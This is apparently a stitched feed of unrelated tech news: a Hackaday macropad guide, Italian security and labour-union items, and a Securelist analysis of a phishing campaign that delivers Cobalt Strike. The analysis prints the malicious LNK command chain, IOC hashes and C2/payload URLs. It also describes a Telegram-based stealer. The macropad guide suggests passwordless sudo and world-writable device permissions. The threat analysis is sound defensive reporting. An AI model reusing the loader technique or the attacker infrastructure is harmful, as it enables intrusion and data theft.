Linux Fu: The Cheap Macropad Conundrum

You can get cheap no-brand macropads for almost nothing now. Some of them have just a couple of keys. Others have lots of keys, knobs, and LEDs. You can spring for a name brand, and it’ll be a good bet that it runs QMK. But the cheap ones? Get ready to download Windows-only software from suspicious Google Drive accounts. Will they work with Linux? Maybe.

Of course, if you don’t mind the keypad doing whatever it normally does, that’s fine. These are little more than HID devices with USB or Bluetooth. But what do those keys send by default? You will really want a way to remap them, especially since they may just send normal characters. So now you want to reverse engineer it. That’s a lot of work. Luckily, someone already has, at least for many of the common pads based around the CH57x chips.

Open Source Configuration

Thanks to [Mikhail Trishchenkov], you can use a nice Linux tool to easily configure your macropad. You can build it from source, or get built versions for Linux, Windows, and Mac. The whole thing is written in Rust if you want to take it apart or modify it.

The configuration might not make GUI users happy, but most Linux users are just fine with editing a yaml file. The software works with lots of different pads, so you do have to explain what you have first. Then you can explain what you want.

The yaml file has several keys of interest (documented in the sample file

• orientation – You can ask the software to treat the pad in its normal orientation or rotated 90, 180, or 270 degrees. This only matters because it is nice to lay out the keys in the right order and you want the knobs clockwise and counterclockwise directions to make sense. Of course, you can do the mental gymnastics to set it up however you like, but this makes it easier.
• row, columns – Different pads have different number of rows and columns. Note that this doesn’t respect your Orientation setting. So if you put any knobs to the left, the horizontal keys are the columns and the vertical keys are the rows.
• knobs – Your pad may have knobs. Count them here.
• layers – You define multiple layers here (but at least one). The cheaper pads only support one layer, but the nicer ones have a pushbutton and LEDs that let you cycle through a few layers of different key definitions.
• buttons – Inside a layer, you can have a bunch of key names in brackets. Depending on the orientation, there will be one set of brackets for each column or one set for each row.
• knobs – Also inside a layer, you can define what happens on ccw, cw, and press events for each button.

The Key

The key names are generally characters (“2” or “d”) but can also be names of keys like “play” or “ctrl-x.” You can set up multiple keys (“a+b”) and there are mouse events like “click” and “wheeldown.”

You can probably guess most keys, but if in doubt, call the configuration with the show-keys argument to get a list.

I renamed the program to macropad-tool. (ch57x-keyboard-tool was too much to type.) I didn’t realize at the time that there was another program that should work with the same pad that already uses that name.

When you have a yaml file ready, you can verify it and then, if it went well, upload it:
macropad-tool validate myconfig.yaml
macropad-tool upload myconfig.yaml

That’s It?

That’s mostly it. There were only a few problems. First, you need to reinitialize the macropad each time. Second, you probably need to be root to write to the device, which is less than handy. You probably want to do more than just keystrokes. For example, you want to have the top left button bring up, for example, Gimp. As a stretch goal, my macropad didn’t support layers, and even if it did, it isn’t handy to have to push a little button to change them. I set out to fix that — sort of.

Last Problem First

The KDE keyboard shortcut dialog can read the keys and make them do actions.
At first, I thought it would be easy to map things since I use KDE. I set the keypad up to generate F13-F25, keys you don’t normally have on most keyboards. It worked, but apparently my setup sees these keycodes as other special characters that are already mapped to things. I could have fixed it, but I decided to go a different direction.

The likelihood that you would bind something to Control+Alt+Shift+… is small. Generally, only a few odd and dangerous keystrokes use this because it takes a lot of dexterity to press all those keys.

But the macropad doesn’t care. So I set up the first key to be Control+Alt+Shift+A, followed by Control+Alt+Shift+B, and so on. Now, I can easily use the KDE keyboard shortcuts from the control panel to catch those keys and do things like launch a shell, change desktops, or whatever.

All the Rest

All the other problems hinge on one thing: it is hard to run the command to initialize the macropad unless you are root. If you had a simple command to set it up, you could easily run it on startup or at any time you wanted to reinitalize the macropad.

In addition, you could bind a key to run the configuration tool to change configurations to make a poor version of layers. Sure, there would be no indication of what layer you were in, but you could fix that a different way (for example, status text on the taskbar). While not ideal, it would be workable.

So how do we get a simple command that can easily load the macropad? There are a few choices. You could have a script owned by root that is sticky. That way, users could run it, but it could become root to configure the keyboard.

I decided to go a slightly different way. I put the tool in /usr/local/bin and the yaml files in /usr/local/share/macropad, which I created. Then I created a script. You’ll probably want to modify it.

The script calls the keypad loader with sudo. But the sudo will just prompt you, right? Well, yes. So you could make an entry in /etc/sudoers.d/99-macropad:
alw ALL=(ALL) NOPASSWD: /usr/local/bin/macropad-tool
Now you, or the script on your behalf, can run the tool with sudo and not provide a password. Since a normal user can’t change /usr/local/bin/macropad or /usr/local/bin/macropad-tool, this is reasonable.

If you prefer, you could write a udev rule to match the USB IDs of your macropad and set the permissions. Something like this:
ATTRS{idProduct}=="8840", ATTRS{idVendor}=="1189", MODE="666", GROUP="users"
If you change the permissions, change the script to not use sudo. And, of course, change the product and vendor IDs to suit your macropad, along with your group, if you need something different. However, that’s probably the best option.

Fake Layers

Since the script allows you to define different layers, you can make a switch change the layer configuration by simply running the script with a given argument on a key press. A hack, but it works. Obviously, each layer will need its own fake keys unless they provide the same function. The file /tmp/macropad-current-layer tracks the current layer, which you can show with something like a command output plasmoid.

Arrange for the script to load on startup using your choice of /etc/rc.local, systemd, or even a udev rule. Whatever you like, and that takes care of all your problems.

Did we mention how cheap these are? Good thing, because you can easily roll your own and put some good software on it like QMK.

hackaday.com/2025/07/30/linux-…

Rilasciato il Kernel Linux 6.16. Novità e miglioramenti senza troppo effetto Woww

Lo scorso fine settimana è stata rilasciata la versione finale del kernel Linux 6.16 , tradizionalmente annunciata da Linus Torvalds in persona. Lo sviluppo è proceduto con calma, ma senza grandi innovazioni: la release si è rivelata più tecnica che sensazionale. Ciononostante, include decine di miglioramenti delle prestazioni, supporto per nuove istruzioni e miglioramenti fondamentali nell’utilizzo della memoria.

Secondo Phoronix, Linux 6.16 contiene ora oltre 38 milioni di righe di codice, distribuite su oltre 78.000 file. E’ stato svolto molto lavoro, dall’ottimizzazione di basso livello ai miglioramenti della sicurezza. Una delle modifiche più importanti è l’aggiunta del supporto per le Advanced Performance Extensions di Intel, introdotte nel 2023. Queste espandono le operazioni vettoriali e raddoppiano il numero di registri generici, ma non funzionano su tutti i processori, il che ricorda i problemi di Intel con la frammentazione del supporto.

Anche i file system hanno ricevuto un incremento delle prestazioni. XFS ha aggiunto scritture atomiche estese mentre ext4 ha acquisito il supporto per bigalloc e large folio, che in alcuni scenari velocizza le operazioni di quasi un terzo. I miglioramenti hanno interessato sia Btrfs che NFS. Anche il meccanismo di core dump è stato modificato : ora i dump della memoria possono essere trasmessi tramite AF_SOCKET, anziché essere salvati solo in una directory. Questo aumenta la flessibilità e la sicurezza durante il debug.

Per i sistemi server NUMA, è stata aggiunta la funzione di auto-ottimizzazione automatica, una funzionalità importante per la distribuzione del carico tra i nodi di memoria. Inoltre, il kernel ora supporta tabelle di pagina a cinque livelli, aprendo la strada a quantità colossali di memoria virtuale. Per le soluzioni e i dispositivi embedded con risorse limitate, un’importante innovazione è la possibilità di delegare la decodifica audio ai chip USB, in fase di sviluppo da diversi anni e finalmente implementata, soprattutto per le piattaforme Qualcomm .

Una panoramica completa delle innovazioni è pubblicata in due parti su LWN: prima parte, seconda parte e un riassunto. È disponibile anche una breve descrizione su kernelnewbies.org, per chi desidera familiarizzare rapidamente con i punti principali.

Torvalds ha avvertito che sarebbe stato in viaggio durante il rilascio della versione Linux 6.17. Questo potrebbe causare ritardi. Sembra un avviso organizzativo, ma ci ricorda anche che il destino del kernel Linux dipende ancora in gran parte da una sola persona.

L'articolo Rilasciato il Kernel Linux 6.16. Novità e miglioramenti senza troppo effetto Woww proviene da il blog della sicurezza informatica.

Stampa Romana su precari Rai: aprire riflessione su sindacato e rappresentanza 

Il ricorso sistematico al precariato, a rapporti di lavoro regolati senza la giusta applicazione del contratto di collettivo dei giornalisti sono ferite gravi inferte dagli editori alla nostra professione, strumenti con i quali si è indebolita l’intera categoria. Per il riscatto occorre coesione e un sindacato inclusivo che garantisca piena e adeguata rappresentanza. Per questo, nel rispetto dell’autonomia di tutte le articolazioni della Fnsi, la richiesta dei colleghi Rai precari e in attesa del “giusto contratto” di potersi iscrivere all’Usigrai, cosa che lo statuto attuale non consente, deve essere l’occasione di una seria riflessione. Regole che diano a tutti i colleghi una equa e proporzionata forza di rappresentanza indipendentemente da dove svolgano la professione, (testate, programmi, ambito nazionale o regionale) sono la migliore risposta a chi ha sciaguratamente scelto la via della scissione, danneggiando, per il vantaggio di pochissimi, il sindacato e l’intera categoria.

La Segreteria dell’Associazione Stampa Romana

dicorinto.it/associazionismo/s…

Orange segnala grave incidente di sicurezza in Francia. Nelle underground messi in vendita 6000 record

La società francese di telecomunicazioni Orange, che serve quasi 300 milioni di clienti in tutto il mondo, ha segnalato un grave incidente di sicurezza che ha causato interruzioni ai servizi chiave in Francia. L’incidente è stato rilevato la sera del 25 luglio dagli specialisti della divisione Cyberdefense di Orange, dopodiché il sistema interessato è stato immediatamente isolato dal resto dell’infrastruttura.

Nonostante la rapida risposta, la localizzazione della minaccia ha causato interruzioni temporanee nel funzionamento delle piattaforme aziendali e dei servizi individuali per i consumatori, incluso l’accesso alla gestione dei servizi e alle funzioni amministrative interne.

Le interruzioni hanno interessato principalmente i clienti in Francia. Si prevede che il pieno ripristino delle normali attività avverrà oggi stesso.

Dal monitoraggio delle underground criminali, nella giornata del 28 luglio è emersa la pubblicazione, all’interno di un forum underground, di un annuncio da parte di un threat actor che ha messo in vendita oltre 6.000 record appartenenti a Orange Moldova.

Dopo aver scoperto l’attacco, i rappresentanti di Orange hanno contattato le autorità competenti e hanno intentato una causa ufficiale, ma non è ancora stato reso noto quali vettori siano stati utilizzati dagli aggressori. L’azienda sottolinea che, allo stato attuale delle indagini, non vi sono segnali di fuga di dati degli utenti o furto di informazioni riservate.

L’incidente in sé presenta molte somiglianze con un’ondata di attacchi contro aziende di telecomunicazioni precedentemente condotta dal gruppo cinese Salt Typhoon, noto per i rapporti della CISA e dell’FBI per attacchi contro operatori di telecomunicazioni negli Stati Uniti e all’estero. Tra i soggetti interessati da queste operazioni su larga scala figurano AT&T, T-Mobile, Verizon, Lumen, Windstream e altre grandi aziende di telecomunicazioni, nonché fornitori di servizi satellitari come Viasat .

È interessante notare che questo è il secondo attacco a Orange negli ultimi sei mesi. Nel febbraio 2025, un hacker che utilizzava lo pseudonimo Rey aveva segnalato la compromissione dell’infrastruttura della divisione rumena dell’azienda. All’epoca, si trattava di accesso a documenti interni, codici, contratti, indirizzi email e dati dei dipendenti, tra cui fonti che affermavano il furto di oltre 380.000 indirizzi email. L’azienda ha riconosciuto l’attacco a un’applicazione ausiliaria, ma ha insistito sul fatto che elementi critici dell’infrastruttura non erano stati interessati.

Orange detiene una posizione dominante in Europa, Africa e Medio Oriente, fornendo servizi di comunicazione mobile, banda larga e cloud alle aziende. Nel 2024, l’azienda serviva 256 milioni di clienti di telefonia mobile e 22 milioni di telefonia fissa, con oltre 125.000 dipendenti e registrando un fatturato annuo di 40,3 miliardi di euro.

L’attacco attuale, nonostante l’assenza di una fuga di dati confermata, resta altamente preoccupante: la minaccia di una ripetizione di campagne di spionaggio su larga scala resta reale, soprattutto data la delicatezza dell’infrastruttura delle telecomunicazioni e la portata internazionale delle operazioni di Orange.

L'articolo Orange segnala grave incidente di sicurezza in Francia. Nelle underground messi in vendita 6000 record proviene da il blog della sicurezza informatica.

Terremoto in Kamčatka, tsunami nel Pacifico. Situazione sotto controllo per i cavi sottomarini

Un terremoto di magnitudo 8,8 ha colpito la mattina del 30 luglio ora locale (09:24:50 UTC+10:00) al largo della costa orientale della Russia, innescando uno tsunami che ha attraversato l’Oceano Pacifico. Secondo l’US Geological Survey (USGS), il terremoto è stato uno dei sei più potenti dal 1900. Il suo epicentro è stato nel Mare di Okhotsk, e si colloca al sesto posto nella lista dei terremoti più forti.

In seguito alle scosse, i paesi del Pacifico hanno iniziato a emettere allerte tsunami. Negli Stati Uniti, il Servizio Meteorologico Nazionale ha consigliato ai residenti lungo l’intera costa occidentale di essere in stato di allerta. In Giappone, le autorità hanno ordinato l’evacuazione immediata dei residenti delle zone costiere basse.

Secondo la BBC, in Giappone sono state registrate onde alte fino a 30 cm. Tuttavia, al momento della pubblicazione, non sono stati segnalati danni o interruzioni alle infrastrutture digitali, comprese quelle di telecomunicazioni, piattaforme cloud e fabbriche di microchip.

Il cavo sottomarino Petropavlovsk-Kamchatsky-Anadyr della Rostelecom, che corre vicino all’epicentro, è potenzialmente vulnerabile, ma l’operatore non ha ancora pubblicato alcuna informazione su possibili guasti. Anche le principali piattaforme cloud, come AWS, Azure e Google, non hanno subito interruzioni. Secondo le pagine di stato, i loro data center in Giappone e in altre regioni funzionano normalmente.

Alla luce degli eventi, gli utenti hanno ricordato il devastante tsunami del 2011 che danneggiò la centrale nucleare di Fukushima. Il gestore dell’impianto, la TEPCO, ha annunciato di aver evacuato il personale e sospeso temporaneamente lo scarico delle acque trattate rimaste inutilizzate da quel momento.

A sud dell’epicentro si trovano numerosi cavi sottomarini e, se il fronte d’onda dovesse intensificarsi, il loro funzionamento potrebbe subire interruzioni.

L'articolo Terremoto in Kamčatka, tsunami nel Pacifico. Situazione sotto controllo per i cavi sottomarini proviene da il blog della sicurezza informatica.

Everyone’s Invited to the Copyparty

Setting up a file server can be intimidating to the uninitiated. There are many servers to choose from, and then you need to decide how to install it — Docker? Kubernates? Well, what’s all that then? [9001] has come to the rescue with Copyparty, a full-featured file server in a single Python script.

It’s light enough to run on nearly anything, and getting it running could not be easier: run copyparty-sfx.py, and you’ve got a server. There’s even a 32-bit .exe for older Windows machines — Windows 2000 seems to be the oldest version tested.
Browsers supported: almost all of them.
It’ll connect to anything, both in terms of the variety of protocols supported, and the browsers its web interface loads in. The GitHub documentation says browser support : “Yes”, which is pretty accurate going down the list. Sadly Copyparty’s pages do not work in NACA Mosaic, but IE4 is A-OK.

There’s, FTP, TFTP, HTTP/HTTPS, WebDAV, SMB/CIFS, with unp/zeroconf/mdns/ssdp, etc etc. You need to check the readme for all features, some of which — like transcoding — are only available when dependencies such as ffmpeg installed on the server. Alternatively you can watch the video embedded below to get walked through the features. If the video whets your appetite, can also visit a read-only Copyparty server being demoed on a NUC sitting in [9001]’s basement.

Over the years we’ve seen plenty of folks create personal servers, but the focus is generally on the hardware side of things. While those with more software experience might prefer to configure the various services involved manually, we can definitely see the appeal of a project like Copyparty. In some ways it’s the inverse of the UNIX Philosophy: instead of doing one thing perfectly, this program is doing everything [9001] could think of, and doing it “good enough”.

Thanks to [pedropolis] for inviting us to the Copyparty via the tips line. Building a NAS? Writing software? Hardware?Whatever you do, the tips line is for you.

youtube.com/embed/15_-hgsX2V0?…

hackaday.com/2025/07/30/everyo…

Cobalt Strike Beacon delivered via GitHub and social media

Introduction

In the latter half of 2024, the Russian IT industry, alongside a number of entities in other countries, experienced a notable cyberattack. The attackers employed a range of malicious techniques to trick security systems and remain undetected. To bypass detection, they delivered information about their payload via profiles on both Russian and international social media platforms, as well as other popular sites supporting user-generated content. The samples we analyzed communicated with GitHub, Microsoft Learn Challenge, Quora, and Russian-language social networks. The attackers thus aimed to conceal their activities and establish a complex execution chain for the long-known and widely used Cobalt Strike Beacon.

Although the campaign was most active during November and December 2024, it continued until April 2025. After a two-month silence, our security solutions began detecting attacks again. The adversary employed new malicious samples, which were only slightly modified versions of those described in the article.

Kaspersky solutions detect this threat and assign the following verdicts:

• HEUR:Trojan.Win64.Agent.gen
• HEUR:Trojan.Win64.Kryptik.gen
• HEUR:Trojan.WinLNK.Starter.gen
• MEM:Trojan.Multi.Cobalt.gen
• HEUR:Trojan.Win32.CobaltStrike.gen

Initial attack vector

The initial attack vector involved spear phishing emails with malicious attachments. The emails were disguised as legitimate communications from major state-owned companies, particularly within the oil and gas sector. The attackers feigned interest in the victims’ products and services to create a convincing illusion of legitimacy and increase the likelihood of the recipient opening the malicious attachment.

Sample spear phishing email

All attachments we observed were RAR archives with the following structure:

• Требования.lnk
• Требования
  
  • Company Profile.pdf
  • List of requirements.pdf
  • Требования
    
    • pdf
    • pdf

    
    

  
  

Company profile.pdf and List of requirements.pdf were decoy files designed to complement the information in the email. The directory Требования\Требования contained executables named Company.pdf and Requirements.pdf, designed to mimic secure PDF documents. The directory itself was hidden, invisible to the user by default.

When Требования.lnk was opened, the files in Требования\Требования were copied to %public%\Downloads\ and renamed: Company.pdf became nau.exe, and Requirements.pdf became BugSplatRc64.dll. Immediately afterward, nau.exe was executed.
%cd% /c echo F | xcopy /h /y %cd%\Требования\Требования %public%\Downloads\

& start %cd%\Требования

& ren %public%\Downloads\Company.pdf nau.exe

& ren %public%\Downloads\Requirements.pdf BugSplatRc64.dll

& %public%\Downloads\nau.exe
Contents of Требования.lnk

Требования.lnk execution sequence

Malicious agent

Process flow diagram for nau.exe

In this attack, the adversary leveraged a common technique: DLL Hijacking (T1574.001). To deploy their malicious payload, they exploited the legitimate Crash reporting Send Utility (original filename: BsSndRpt.exe). The tool is part of BugSplat, which helps developers get detailed, real-time crash reports for their applications. This was the utility that the attackers renamed from Company.pdf to nau.exe.

For BsSndRpt.exe to function correctly, it requires BugSplatRc64.dll. The attackers saved their malicious file with that name, forcing the utility to load it instead of the legitimate file.

To further evade detection, the malicious BugSplatRc64.dll library employs Dynamic API Resolution (T1027.007). This technique involves obscuring API functions within the code, resolving them dynamically only during execution. In this specific case, the functions were obfuscated via a custom hashing algorithm, which shares similarities with CRC (Cyclic Redundancy Check).

Hashing algorithm

A significant portion of the hashes within the malicious sample are XOR-encrypted. Additionally, after each call, the address is removed from memory, and API functions are reloaded if a subsequent call is needed.

MessageBoxW function hook

The primary purpose of BugSplatRc64.dll is to intercept API calls within the legitimate utility’s process address space to execute its malicious code (DLL Substitution, T1574.001). Instead of one of the API functions required by the process, a call is made to a function (which we’ll refer to as NewMessageBox) located within the malicious library’s address space. This technique makes it difficult to detect the malware in a sandbox environment, as the library won’t launch without a specific executable file. In most of the samples we’ve found, the MessageBoxW function call is modified, though we’ve also discovered samples that altered other API calls.

Hooking MessageBoxW

After modifying the intercepted function, the library returns control to the legitimate nau.exe process.

NewMessageBox function

Once the hook is in place, whenever MessageBoxW (or another modified function) is called within the legitimate process, NewMessageBox executes. Its primary role is to run a shellcode, which is loaded in two stages.

First, the executable retrieves HTML content from a webpage located at one of the addresses encrypted within the malicious library. In the sample we analyzed, these addresses were techcommunity.microsoft[.]com/… and quora[.]com/profile/Marieforma…. The information found at both locations is identical. The second address serves as a backup if the first one becomes inactive.

NewMessageBox searches the HTML code retrieved from these addresses for a string whose beginning and end match patterns that are defined in the code and consist of mixed-case alphanumeric characters. This technique allows attackers to leverage various popular websites for storing these strings. We’ve found malicious information hidden inside profiles on GitHub, Microsoft Learn Challenge, Q&A websites, and even Russian social media platforms.

Malicious profiles on popular online platforms

While we didn’t find any evidence of the attackers using real people’s social media profiles, as all the accounts were created specifically for this attack, aligning with MITRE ATT&CK technique T1585.001, there’s nothing stopping the threat actor from abusing various mechanisms these platforms provide. For instance, malicious content strings could be posted in comments on legitimate users’ posts.

The extracted payload is a base64-encoded string with XOR-encrypted data. Decrypted, this data reveals the URL raw.githubusercontent[.]com/Ma…, which then downloads another XOR-encrypted shellcode.

We initially expected NewMessageBox to execute the shellcode immediately after decryption. Instead, nau.exe launches a child process with the same name and the qstt parameter, in which all of the above actions are repeated once again, ultimately resulting in the execution of the shellcode.

Shellcode

An analysis of the shellcode (793453624aba82c8e980ca168c60837d) reveals a reflective loader that injects Cobalt Strike Beacon into the process memory and then hands over control to it (T1620).

The observed Cobalt sample communicates with the C2 server at moeodincovo[.]com/divide/mail/SUVVJRQO8QRC.

Attribution and victims

The method used to retrieve the shellcode download address is similar to the C2 acquisition pattern that our fellow security analysts observed in the EastWind campaign. In both cases, the URL is stored in a specially crafted profile on a legitimate online platform like Quora or GitHub. In both instances, it’s also encrypted using an XOR algorithm. Furthermore, the targets of the two campaigns partially overlap: both groups of attackers show interest in Russian IT companies.

It’s worth mentioning that while most of the attacks targeted Russian companies, we also found evidence of the malicious activity in China, Japan, Malaysia, and Peru. The majority of the victims were large and medium-sized businesses.

Takeaways

Threat actors are using increasingly complex and clever methods to conceal long-known tools. The campaign described here used techniques like DLL hijacking, which is gaining popularity among attackers, as well as obfuscating API calls within the malicious library and using legitimate resources like Quora, GitHub, and Microsoft Learn Challenge to host C2 addresses. We recommend that organizations adhere to the following guidelines to stay safe:

• Track the status of their infrastructure and continuously monitor their perimeter.
• Use powerful security solutions to detect and block malware embedded within bulk email.
• Train their staff to increase cybersecurity awareness.
• Secure corporate devices with a comprehensive system that detects and blocks attacks in the early stages.

You can detect the malware described here by searching for the unsigned file BugSplatRc64.dll in the file system. Another indirect sign of an attack could be the presence of Crash reporting Send Utility with any filename other than the original BsSndRpt.exe.

IOCs:

LNK
30D11958BFD72FB63751E8F8113A9B04
92481228C18C336233D242DA5F73E2D5

Legitimate BugSplat.exe
633F88B60C96F579AF1A71F2D59B4566

DLL
2FF63CACF26ADC536CD177017EA7A369
08FB7BD0BB1785B67166590AD7F99FD2
02876AF791D3593F2729B1FE4F058200
F9E20EB3113901D780D2A973FF539ACE
B2E24E061D0B5BE96BA76233938322E7
15E590E8E6E9E92A18462EF5DFB94298
66B6E4D3B6D1C30741F2167F908AB60D
ADD6B9A83453DB9E8D4E82F5EE46D16C
A02C80AD2BF4BFFBED9A77E9B02410FF
672222D636F5DC51F5D52A6BD800F660
2662D1AE8CF86B0D64E73280DF8C19B3
4948E80172A4245256F8627527D7FA96

URL
hxxps://techcommunity[.]microsoft[.]com/users/kyongread/2573674
hxxps://techcommunity[.]microsoft[.]com/users/mariefast14/2631452
hxxps://raw[.]githubusercontent[.]com/fox7711/repos/main/1202[.]dat
hxxps://my[.]mail[.]ru/mail/nadezhd_1/photo/123
hxxps://learn[.]microsoft[.]com/en-us/collections/ypkmtp5wxwojz2
hxxp://10[.]2[.]115[.]160/aa/shellcode_url[.]html
hxxps://techcommunity[.]microsoft[.]com/t5/user/viewprofilepage/user-id/2548260
hxxps://techcommunity[.]microsoft[.]com/t5/user/viewprofilepage/user-id/2631452
hxxps://github[.]com/Mashcheeva
hxxps://my[.]mail[.]ru/mail/veselina9/photo/mARRy
hxxps://github[.]com/Kimoeli
hxxps://www[.]quora[.]com/profile/Marieformach
hxxps://moeodincovo[.]com/divide/mail/SUVVJRQO8QRC

securelist.com/cobalt-strike-a…

Giornalisti, contratto fermo dal 2016ma agli editori 240 milioni di finanziamenti

Negli ultimi 9 anni gli stipendi degli italiani sono stati erosi dal 19,3% di inflazione certificata dall’Istat. In questi stessi anni diversi contratti di lavoro nazionali sono stati rinnovati: non quello dei giornalisti, fermo al 2016. Gli editori, però, nel frattempo hanno incassato almeno 240 milioni di euro in aiuti dallo Stato e hanno alleggerito le redazioni (meno 15% di giornalisti regolarmente assunti), aumentando il lavoro precario e sottopagato: un articolo viene retribuito in media 10 euro lordi. Un meccanismo che ha garantito alla stragrande maggioranza degli editori di macinare utili. Da 15 mesi la Federazione nazionale della Stampa italiana si sta confrontando con la Federazione Italiana Editori Giornali per rinnovare il contratto nazionale di lavoro giornalistico, chiedendo aumenti dignitosi per il recupero del potere d’acquisto, investimenti sui giovani, linee guida per governare la trasformazione digitale, a partire dall’intelligenza artificiale, idee e progetti per modernizzare l’editoria italiana con l’obiettivo di alzare la qualità del giornalismo e contrastare la disinformazione e le fake news.

La Costituzione sancisce il diritto di ogni lavoratore a una giusta retribuzione che, per i giornalisti, è anche una garanzia di libertà e per i lettori una certezza di qualità: solo retribuzioni adeguate possono assicurare un lavoro professionale attento e profondo e, quindi, un’informazione certa e a difesa dei cittadini. Tutto questo non sembra interessare agli editori, più concentrati sul taglio dei costi e sul prossimo giro di valzer per chiedere altri soldi al Governo piuttosto che sulle numerose sfide imposte dalla rivoluzione digitale per cercare, insieme ai giornalisti, la strada per superare una crisi devastante. Non hanno voluto confrontarsi sull’uso dell’Ai, sul rapporto coi giganti del web che condizionano sempre di più l’informazione (omologandola), sulle prospettive occupazionali, rimandando a chissà quando ogni discussione. Con un evidente problema: rinviare ancora nel caso dell’editoria significa soccombere, portare il settore a morte certa.

Ma anche quando si è provato a trattare un accordo ponte solo per il rinnovo economico, lo schema si è ripetuto. Il recupero dell’inflazione è la linea di demarcazione di tutto il mondo del lavoro del nostro paese. L’offerta della Fieg, invece, è di gran lunga inferiore rispetto ai rinnovi contrattuali degli altri lavoratori del nostro paese i cui redditi reali sotto l’impulso delle organizzazioni sindacali si sono rafforzati. Non solo: mentre da tempo è in atto una progressiva destrutturazione del Contratto Nazionale di Lavoro, gli editori al tavolo hanno chiesto per i nuovi assunti un nuovo salario d’ingresso al ribasso. Un ulteriore sconto sulle assunzioni obbligatorie per legge in seguito a prepensionamenti (che per gli editori, dal 2022, sono completamente gratuiti) e per questo inaccettabile.

Come giornalisti continueremo a fare il nostro dovere di informare i cittadini con coscienza e impegno, ma siamo anche pronti a mobilitarci per difendere i nostri diritti di lavoratori.

dicorinto.it/associazionismo/g…

Arriva Raven Stealer! Il malware che ruba i tuoi dati utilizzando telegram come “strumento di formazione”

Nel contesto della crescente attività di campagne dannose che utilizzano canali di comunicazione legittimi per aggirare le difese tradizionali, un nuovo strumento ha attirato l’attenzione degli specialisti della sicurezza informatica: Raven Stealer. Questo programma di furto di informazioni è apparso nel luglio 2025 e si è già diffuso tramite Telegram e GitHub, attirando l’attenzione non solo per le sue funzionalità, ma anche per la sua combinazione di furtività, facilità d’uso ed efficacia nel recapitare i dati rubati.

Raven è attualmente oggetto di accese discussioni tra gli analisti delle minacce, in quanto dimostra come gli antivirus e i meccanismi di protezione integrati nei browser possano essere aggirati con mezzi semplici. Raven Stealer è sviluppato in Delphi e C++ e prende di mira i sistemi Windows. Raccoglie dati di accesso, dati di pagamento e compilazioni automatiche dai browser Chromium, inclusi Chrome ed Edge. Il malware viene distribuito tramite il canale Telegram di ZeroTrace sotto forma di “strumento di formazione” e consente anche agli utenti inesperti di avviare furti di dati utilizzando il generatore di build integrato. Telegram viene utilizzato anche come canale per la trasmissione di informazioni rubate, eliminando la necessità di un classico server C2.

Gli assembly vengono compressi tramite UPX per rendere difficile l’analisi ed evitare il rilevamento. Una volta avviato, il malware inietta un modulo crittografato nei processi del browser utilizzando chiamate di sistema come NtWriteVirtualMemory, che gli consentono di bypassare il file system. Password, cookie e dati di pagamento vengono estratti in memoria, bypassando la protezione di crittografia associata all’app.

Inoltre, Raven analizza il sistema alla ricerca di portafogli crittografici, VPN e giochi, e salva tutti i dati in un archivio ZIP con il nome utente. Il trasferimento avviene tramite “curl.exe”, che utilizza l’API di Telegram per scaricare file, inclusi screenshot ed elenchi di testo con informazioni riservate. I metodi implementati in Raven corrispondono a diverse tecniche di MITRE ATT&CK: offuscamento, finestre nascoste, directory harvesting e utilizzo di Telegram come canale di comando. Questa architettura rende lo strumento potente e stealth.

Il team di ZeroTrace supporta il progetto dalla fine di aprile 2025, pubblicando aggiornamenti e codice sorgente su GitHub e Telegram. Il malware è già stato confrontato con un altro dei loro prodotti, Octalyn Stealer, a dimostrazione di una strategia sistematica per la distribuzione di infostealer semplici ma efficaci. Come misure di protezione, gli esperti raccomandano di monitorare i file compressi UPX, i flag di avvio non standard del browser, le chiamate curl e l’accesso alle API di Telegram, nonché di utilizzare l’analisi comportamentale e il monitoraggio delle chiamate di sistema.

Raven Stealer è un’ulteriore dimostrazione di quanto facilmente la tecnologia possa essere trasformata in uno strumento di profitto underground. Sotto le mentite spoglie di uno “strumento di formazione”, si cela un’utilità predatoria che non insegna, ma corrompe, semplificando il percorso verso il crimine e sfumando il confine tra sviluppo e complicità.

L'articolo Arriva Raven Stealer! Il malware che ruba i tuoi dati utilizzando telegram come “strumento di formazione” proviene da il blog della sicurezza informatica.

A Dual-Screen Cyberdeck To Rule Them All

We like cyberdecks here at Hackaday, and in our time we’ve brought you some pretty amazing builds. But perhaps now we’ve seen the ultimate of the genre, a cyberdeck so perfect in its execution that this will be the machine of choice in the dystopian future, leaving all the others as mere contenders. It comes courtesy of [Sector 07], and it’s a machine to be proud of.

As with many cyberdecks, it uses the Raspberry Pi as its powerhouse. There are a couple of nice touchscreens and a decent keyboard, plus the usual ports and some nice programmable controls. These are none of them out of the ordinary for a cyberdeck, but what really shines with this one is the attention to detail in the mechanical design. Those touchscreens rotate on ball bearings, the hinges are just right, the connections to the Pi have quick release mechanisms, and custom PCBs and ribbon cables make distributing those GPIOs a snap.

On top of all that the aesthetics are on point; this is the machine you want to take into the abandoned mining base with you. Best of all it’s all available from the linked GitHub repository, and you can marvel as we did at the video below the break.

If you hunger for more cyberdecks, this one has some very stiff competition.

youtube.com/embed/cigAxzQGeLg?…

Thanks [Jeremy Geppert] for the tip.

hackaday.com/2025/07/30/a-dual…

Microsoft licenzia 15.000 dipendenti, Nadella: “Dobbiamo ripensare la nostra missione per una nuova era”

Dal 2025, Microsoft ha licenziato oltre 15.000 dipendenti, e il peso di queste misure di austerità ha rappresentato una forte pressione anche per il CEO Satya Nadella. “Innanzitutto, vorrei affrontare un problema che mi pesa molto e che so essere sentito da molti di voi: i recenti licenziamenti”, ha scritto Nadella in una nota rivolta ai dipendenti giovedì.

Gli investitori hanno reagito positivamente: il 9 luglio, dopo l’ultimo ciclo di licenziamenti, le azioni di Microsoft hanno chiuso per la prima volta sopra i 500 dollari. Solo una settimana prima, l’azienda aveva annunciato il taglio di circa 9.000 posti di lavoro. Si prevede che la forza lavoro complessiva dell’azienda raggiungerà quota 228.000 entro giugno 2024. Tuttavia, Microsoft non ha ancora diffuso un aggiornamento che includa anche i licenziamenti più recenti; Nadella, nella sua comunicazione interna, ha specificato che “la forza lavoro totale rimane sostanzialmente invariata”.

“Questo è il dilemma del successo in un settore senza valore di franchising”, ha scritto. “Il progresso non è lineare. È dinamico, a volte sconvolgente e sempre impegnativo. Ma questo ci offre anche nuove opportunità per plasmare, guidare e avere un impatto maggiore che mai”.

